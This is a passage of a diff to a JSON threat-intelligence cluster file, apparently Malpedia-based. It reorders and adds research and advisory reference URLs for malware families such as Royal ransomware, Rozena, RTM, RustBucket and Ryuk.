"synonyms": [ "BkLoader", @@ -42200,10 +44198,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", - "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://www.secureworks.com/research/threat-profiles/bronze-palace", - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" ], "synonyms": [], "type": [] @@ -42216,10 +44214,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", - "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://www.secureworks.com/research/threat-profiles/bronze-palace", - "https://github.com/nccgroup/Royal_APT", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" + "https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://github.com/nccgroup/Royal_APT" ], "synonyms": [], "type": [] @@ -42232,29 +44230,33 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_ransom", - "https://www.trellix.com/en-us/about/newsroom/stories/research/a-royal-analysis-of-royal-ransom.html", - "https://www.logpoint.com/en/blog/exploring-the-exploit-of-royal-ransomware/", - "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html", - "https://yoroi.company/research/reconstructing-the-last-activities-of-royal-ransomware/", - "https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf", + "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65", + "https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/", + "https://securityscorecard.pathfactory.com/research/the-royal-ransomware", + "https://socradar.io/dark-web-profile-royal-ransomware/", + "https://unit42.paloaltonetworks.com/royal-ransomware/", + "https://www.bridewell.com/insights/news/detail/hunting-for-ursnif", "https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/", + "https://www.cybereason.com/blog/royal-ransomware-analysis", + "https://yoroi.company/research/reconstructing-the-last-activities-of-royal-ransomware/", + "https://www.fortinet.com/blog/threat-research/ransomware-roundup-royal-ransomware", + "https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/", + "https://www.cyber.gov.au/about-us/advisories/2023-01-acsc-ransomware-profile-royal", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a", + "https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html", + "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", + "https://www.logpoint.com/en/blog/exploring-the-exploit-of-royal-ransomware/", + "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-royal-ransomware", + "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", + "https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html", "https://www.cyber.gov.au/acsc/view-all-content/advisories/2023-01-acsc-ransomware-profile-royal", "https://www.coalitioninc.com/blog/active-exploitation-firewalls", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://unit42.paloaltonetworks.com/royal-ransomware/", - "https://www.cyber.gov.au/about-us/advisories/2023-01-acsc-ransomware-profile-royal", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", "https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive", - "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65", - "https://securityscorecard.pathfactory.com/research/the-royal-ransomware", - "https://www.fortinet.com/blog/threat-research/ransomware-roundup-royal-ransomware", - "https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html", - "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a", - "https://socradar.io/dark-web-profile-royal-ransomware/", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", - "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-royal-ransomware", - "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", - "https://www.cybereason.com/blog/royal-ransomware-analysis" + "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/", + "https://www.trellix.com/en-us/about/newsroom/stories/research/a-royal-analysis-of-royal-ransom.html", + "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf" ], "synonyms": [], "type": [] @@ -42267,10 +44269,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena", - "https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor", - "https://www.socinvestigation.com/threat-actors-delivers-new-rozena-backdoor-with-follina-bug-detection-response/", "https://www.gdatasoftware.com/blog/2019/07/35061-server-side-polymorphism-powershell-backdoors", - "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena" + "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena", + "https://www.socinvestigation.com/threat-actors-delivers-new-rozena-backdoor-with-follina-bug-detection-response/", + "https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor" ], "synonyms": [], "type": [] @@ -42283,13 +44285,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", - "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf", "https://jonahacks.medium.com/malware-analysis-manual-unpacking-of-redaman-ec1782352cfb", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", - "http://www.peppermalware.com/2019/11/brief-analysis-of-redaman-banking.html", + "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf", "https://securelist.com/financial-cyberthreats-in-2020/101638/", - "https://www.youtube.com/watch?v=YXnNO3TipvM", + "http://www.peppermalware.com/2019/11/brief-analysis-of-redaman-banking.html", "https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.youtube.com/watch?v=YXnNO3TipvM", "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/" ], "synonyms": [ @@ -42399,20 +44401,33 @@ "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", "value": "Rurktar" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustbucket", + "https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "832680ff-8b29-492e-8523-62510eb5d021", + "value": "RustBucket (Windows)" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", - "https://darknetdiaries.com/episode/110/", - "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", - "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/", "http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html", - "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", - "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "https://www.secureworks.com/blog/research-21041", "http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/", "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", + "https://darknetdiaries.com/episode/110/", + "http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html", + "https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html", + "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf" ], "synonyms": [], @@ -42426,170 +44441,171 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk", - "https://www.youtube.com/watch?v=LUxOcpIRxmg", - "https://github.com/scythe-io/community-threats/tree/master/Ryuk", - "https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects", - "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", + "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/", + "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12", "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", - "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", - "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", - "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/", - "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", - "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets", - "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", - "https://unit42.paloaltonetworks.com/ryuk-ransomware/", - "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", - "https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html", - "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/", - "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", - "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes", - "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", - "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf", - "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf", - "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", - "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html", - "https://blogs.quickheal.com/deep-dive-wakeup-lan-wol-implementation-ryuk/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks", + "https://github.com/scythe-io/community-threats/tree/master/Ryuk", + "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "https://www.youtube.com/watch?v=CgDtm05qApE", + "https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/", + "https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://community.riskiq.com/article/0bcefe76", + "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", + "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", + "https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/", + "https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html", + "https://www.youtube.com/watch?v=LUxOcpIRxmg", + "https://www.youtube.com/watch?v=7xxRunBP5XA", + "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes", + "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker", + "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", + "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html", + "https://ia.acs.org.au/article/2019/hospital-cyberattack-could-have-been-avoided.html", + "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", + "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", + "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html", + "https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/", + "https://twitter.com/Prosegur/status/1199732264386596864", + "https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp", + "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.youtube.com/watch?v=HwfRxjV2wok", + "https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more", + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", + "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/", + "https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/", + "https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/", + "https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects", + "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/", + "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", + "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html", + "https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP", + "https://www.secureworks.com/research/threat-profiles/gold-ulrick", + "https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", + "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", + "https://thehackernews.com/2022/05/malware-analysis-trickbot.html", + "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", + "https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", "https://twitter.com/SophosLabs/status/1321844306970251265", + "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", + "https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/", + "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/", + "https://0xchina.medium.com/malware-reverse-engineering-31039450af27", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders", + "https://twitter.com/IntelAdvanced/status/1353546534676258816", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://twitter.com/ffforward/status/1324281530026524672", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/", + "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://unit42.paloaltonetworks.com/ryuk-ransomware/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://www.scythe.io/library/threatthursday-ryuk", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", + "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", + "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/", + "https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-deployed-two-weeks-after-trickbot-infection/", + "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/", + "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://community.riskiq.com/article/c88cf7e6", + "https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html", + "https://blogs.quickheal.com/deep-dive-wakeup-lan-wol-implementation-ryuk/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf", + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc", + "https://twitter.com/IntelAdvanced/status/1356114606780002308", + "https://twitter.com/anthomsec/status/1321865315513520128", + "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/", - "https://www.scythe.io/library/threatthursday-ryuk", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", + "https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://blog.cyberint.com/ryuk-crypto-ransomware", "https://www.youtube.com/watch?v=Of_KjNG9DHc", - "https://community.riskiq.com/article/c88cf7e6", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/", - "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", - "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", - "https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html", - "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", - "https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/", - "https://twitter.com/IntelAdvanced/status/1353546534676258816", - "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", - "https://www.secureworks.com/research/threat-profiles/gold-ulrick", - "https://arcticwolf.com/resources/blog/karakurt-web", - "https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider", - "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", - "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf", - "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html", - "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf", - "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", - "https://www.youtube.com/watch?v=HwfRxjV2wok", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://sites.temple.edu/care/ci-rw-attacks/", "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", "https://www.youtube.com/watch?v=BhjQ6zsCVSc", - "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/", - "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", - "https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456", - "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/", - "https://ia.acs.org.au/article/2019/hospital-cyberattack-could-have-been-avoided.html", - "https://0xchina.medium.com/malware-reverse-engineering-31039450af27", - "https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/", - "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", - "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://thedfirreport.com/2020/10/08/ryuks-return/", - "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", - "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", - 